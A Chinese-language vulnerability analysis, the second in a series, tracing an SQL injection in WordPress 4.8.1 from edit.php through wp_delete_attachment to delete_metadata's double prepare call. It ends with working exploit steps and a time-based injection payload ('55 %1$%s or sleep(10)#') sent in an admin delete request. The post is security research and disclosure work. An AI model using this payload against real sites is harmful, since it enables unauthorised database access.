Wordpress SQL注入分析(二)

作者:@Ambulong

在上一篇文章 Wordpress SQL注入分析(一) 中,我们分析了Wordpress中的prepare函数在什么情况下会产生SQL注入漏洞。本篇文章将分析Wordpress中的一处SQL注入。


在上一篇文章 Wordpress SQL注入分析(一) 中,我们分析了Wordpress中的prepare函数在什么情况下会产生SQL注入漏洞。本篇文章将分析Wordpress中的一处SQL注入。

当前最新版:Wordpress 4.8.1

第三章:发现Wordpress中的SQL注入

3.1 SQL注入分析

在delete_metadata函数(文件:/wp-includes/meta.php)中存在如下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
function delete_metadata($meta_type, $object_id, $meta_key, $meta_value = '', $delete_all = false) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) && ! $delete_all ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id && ! $delete_all ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$type_column = sanitize_key($meta_type . '_id');
$id_column = 'user' == $meta_type ? 'umeta_id' : 'meta_id';
// expected_slashed ($meta_key)
$meta_key = wp_unslash($meta_key);
$meta_value = wp_unslash($meta_value);
$check = apply_filters( "delete_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $delete_all );
if ( null !== $check )
return (bool) $check;
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
$query = $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s", $meta_key );
if ( !$delete_all )
$query .= $wpdb->prepare(" AND $type_column = %d", $object_id );
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value )
$query .= $wpdb->prepare(" AND meta_value = %s", $meta_value );
$meta_ids = $wpdb->get_col( $query );
if ( !count( $meta_ids ) )
return false;
if ( $delete_all ) {
$value_clause = '';
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
=> $value_clause = $wpdb->prepare( " AND meta_value = %s", $meta_value );
}
=> $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) );
}
...//ignore
}

我们来看下关键部分代码:

1
2
3
4
5
6
7
if ( $delete_all ) {
$value_clause = '';
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
=> $value_clause = $wpdb->prepare( " AND meta_value = %s", $meta_value );
}
=> $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) );
}

按我们上一篇文章的分析,若$meta_value可控,此处就存在SQL注入漏洞。而$meta_value变量是作为参数从外部传进来的,所以我们需要查找调用到delete_metadata函数,且第四个参数可控的地方。

我们此处直接选用@slavco文章中的wp_delete_attachment函数(文件:/wp-includes/post.php),代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function wp_delete_attachment( $post_id, $force_delete = false ) {
global $wpdb;
if ( !$post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) ) )
return $post;
if ( 'attachment' != $post->post_type )
return false;
if ( !$force_delete && EMPTY_TRASH_DAYS && MEDIA_TRASH && 'trash' != $post->post_status )
return wp_trash_post( $post_id );
delete_post_meta($post_id, '_wp_trash_meta_status');
delete_post_meta($post_id, '_wp_trash_meta_time');
$meta = wp_get_attachment_metadata( $post_id );
$backup_sizes = get_post_meta( $post->ID, '_wp_attachment_backup_sizes', true );
$file = get_attached_file( $post_id );
if ( is_multisite() )
delete_transient( 'dirsize_cache' );
do_action( 'delete_attachment', $post_id );
wp_delete_object_term_relationships($post_id, array('category', 'post_tag'));
wp_delete_object_term_relationships($post_id, get_object_taxonomies($post->post_type));
// Delete all for any posts.
=> delete_metadata( 'post', null, '_thumbnail_id', $post_id, true );
...//ignore
}

关键代码:

1
delete_metadata( 'post', null, '_thumbnail_id', $post_id, true );

里面的$post_id同样从外部传入,所以我们继续查找调用到wp_delete_attachment函数,且第一个参数可控的地方。

在文件/wp-admin/edit.php中有个比较明显的调用点,且$post_id(即:wp_delete_attachment函数的第一个参数)可控。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
case 'delete':
$deleted = 0;
foreach ( (array) $post_ids as $post_id ) {
$post_del = get_post($post_id);
if ( !current_user_can( 'delete_post', $post_id ) )
wp_die( __('Sorry, you are not allowed to delete this item.') );
if ( $post_del->post_type == 'attachment' ) {
=> if ( ! wp_delete_attachment($post_id) )
wp_die( __('Error in deleting.') );
} else {
if ( !wp_delete_post($post_id) )
wp_die( __('Error in deleting.') );
}
$deleted++;
}
$sendback = add_query_arg('deleted', $deleted, $sendback);
break;

3.2 利用条件分析

我们首先简单地整理下相关文件/函数的调用过程与调用条件。

1. 文件:/wp-admin/edit.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
...//ignore
$doaction = $wp_list_table->current_action();
if ( $doaction ) {
check_admin_referer('bulk-posts');
...//ignore
} elseif ( isset( $_REQUEST['media'] ) ) {
$post_ids = $_REQUEST['media'];
} elseif ( isset( $_REQUEST['ids'] ) ) {
$post_ids = explode( ',', $_REQUEST['ids'] );
} elseif ( !empty( $_REQUEST['post'] ) ) {
$post_ids = array_map('intval', $_REQUEST['post']);
}
if ( !isset( $post_ids ) ) {
wp_redirect( $sendback );
exit;
}
switch ( $doaction ) {
...//ignore
case 'delete':
$deleted = 0;
foreach ( (array) $post_ids as $post_id ) {
$post_del = get_post($post_id);
if ( !current_user_can( 'delete_post', $post_id ) )
wp_die( __('Sorry, you are not allowed to delete this item.') );
if ( $post_del->post_type == 'attachment' ) {
if ( ! wp_delete_attachment($post_id) )
wp_die( __('Error in deleting.') );
} else {
if ( !wp_delete_post($post_id) )
wp_die( __('Error in deleting.') );
}
$deleted++;
}
...//ignore

需满足条件:

  • $doaction = $wp_list_table->current_action() = ‘delete’
    即:$_REQUEST[‘action’] = ‘delete’
  • 通过check_admin_referer(‘bulk-posts’)
    检查$_REQUEST[‘_wpnonce’]
  • $post_ids = $_REQUEST[‘media’] = ‘%1$%s abc’
    传入测试注入字符串
  • current_user_can( ‘delete_post’, $post_id ) == true
    当前用户是否有删除该文章权限
  • $post_del->post_type == ‘attachment’
    该文章类型为attachment,可通过添加媒体功能添加

2. 文件:/wp-includes/post.php

1
2
3
4
5
6
7
8
9
10
11
12
...//ignore
function wp_delete_attachment( $post_id, $force_delete = false ) {
global $wpdb;
if ( !$post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) ) )
return $post;
if ( 'attachment' != $post->post_type )
return false;
if ( !$force_delete && EMPTY_TRASH_DAYS && MEDIA_TRASH && 'trash' != $post->post_status )
return wp_trash_post( $post_id );
...//ignore
delete_metadata( 'post', null, '_thumbnail_id', $post_id, true );
...//ignore

需满足条件:

  • $post_id对应的文章存在
    因为有类型转换,所以可以用$post_id = '123 %1$%s abc'绕过。(转换为整数后$post_id = 123
  • $post_id对应的文章类型为attachment

3. 文件:/wp-includes/meta.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
...//ignore
function delete_metadata($meta_type, $object_id, $meta_key, $meta_value = '', $delete_all = false) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) && ! $delete_all ) {
return false;
}
...//ignore
$meta_key = wp_unslash($meta_key);
$meta_value = wp_unslash($meta_value);
$check = apply_filters( "delete_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $delete_all );
if ( null !== $check )
return (bool) $check;
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
$query = $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s", $meta_key );
if ( !$delete_all )
$query .= $wpdb->prepare(" AND $type_column = %d", $object_id );
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value )
$query .= $wpdb->prepare(" AND meta_value = %s", $meta_value );
$meta_ids = $wpdb->get_col( $query );
if ( !count( $meta_ids ) )
return false;
if ( $delete_all ) {
$value_clause = '';
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
$value_clause = $wpdb->prepare( " AND meta_value = %s", $meta_value );
}
$object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) );
}
...//ignore

需满足条件:

  • “SELECT meta_id FROM wp_postmeta WHERE meta_key = ‘_thumbnail_id’ AND meta_value = ‘xxx’”存在
    即:需要使得wp_postmeta表内的_thumbnail_id的内容与我们的SQL语句一样(即内容为’123 %2$%s abc’)。

wp_postmeta表内的meta_key和meta_value字段是可通过写文章功能内的自定义栏目添加的。但是禁止添加名称以下划线开头的自定义栏目,所以正常情况下我们无法添加_thumbnail_id栏目。

关于如果绕过下划线检查添加post meta,请见下一篇文章:

3.3 SQL注入漏洞利用

  1. 添加媒体(/wp-admin/media-new.php),并记住媒体ID(这里的ID是55)。
添加媒体
  1. 获取_wpnonce。
    打开/wp-admin/edit.php?post_type=post,找到posts-filter内的_wpnonce(这里的_wpnonce是301ee97c09)
添加媒体
  1. 添加/修改POST META,使存在meta_key为’_thumbnail_id’的meta_value为'55 %1$%s or sleep(10)#'

  2. 访问/wp-admin/edit.php?action=delete&_wpnonce=301ee97c09&ids=55 %1$%s or sleep(10)#,触发SQL注入漏洞